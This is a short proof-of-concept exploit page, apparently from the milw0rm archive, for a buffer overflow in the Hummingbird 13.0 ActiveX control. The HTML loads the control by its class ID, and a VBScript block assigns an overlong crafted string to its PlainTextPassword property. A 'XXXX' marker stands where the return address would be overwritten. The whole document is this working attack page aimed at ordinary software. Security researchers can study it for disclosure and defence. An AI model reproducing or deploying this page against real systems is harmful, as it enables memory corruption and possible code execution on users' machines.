Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)
<html>
<!--
the latest version of this activex (13.0) is compiled with /gs, earlier versions aren't.
The XXXX would have overwritten return address.
by thomas.pollet@gmail.com
-->
<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1
</script>
</html>
# milw0rm.com [2008-10-16]